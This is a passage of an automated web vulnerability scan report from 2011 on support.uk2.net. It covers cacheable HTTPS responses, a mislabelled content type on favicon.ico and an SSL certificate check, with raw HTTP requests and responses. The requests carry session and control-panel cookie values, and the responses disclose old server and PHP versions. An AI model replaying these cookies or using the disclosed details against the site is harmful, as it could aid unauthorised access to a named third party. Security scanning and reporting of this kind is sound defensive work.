Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


7.1. https://support.uk2.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /

Request

GET / HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1300482878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.322152152.1300482878.1300482878.1300482878.1; __utmc=1; __utmb=1.4.10.1300482878; controlpanel=252e04460e20e55762b6d51becd6ec5a

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:20:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: SWIFT_sessionid40=0a0f277c21f645c6892c8d9725b29eb3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Help and support 24 hours a day. Raise a ticket, call us on 0905 168 0086
...[SNIP]...

7.2. https://support.uk2.net/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885; SWIFT_sessionid80=10b9c0108972703c68b5e1555f596542; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:21:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Aug 2008 12:47:01 GMT
ETag: "65028a-47e-45442ab0a5b40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

8. Content type incorrectly stated  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.uk2.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: support.uk2.net
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: controlpanel=252e04460e20e55762b6d51becd6ec5a; __utmz=1.1300482988.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1959935846.1300482988.1300482988.1300482988.1; __utmc=1; __utmb=1.2.10.1300482988; SWIFT_sessionid40=aac2569f2f2761a35954d5540ec78885; SWIFT_sessionid80=10b9c0108972703c68b5e1555f596542; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 21:21:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Aug 2008 12:47:01 GMT
ETag: "65028a-47e-45442ab0a5b40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

9. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.uk2.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.uk2.net
Issued by:  PositiveSSL CA
Valid from:  Tue Aug 10 19:00:00 CDT 2010
Valid to:  Thu Aug 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:  PositiveSSL CA
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Sep 17 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Mar 18 16:52:10 CDT 2011.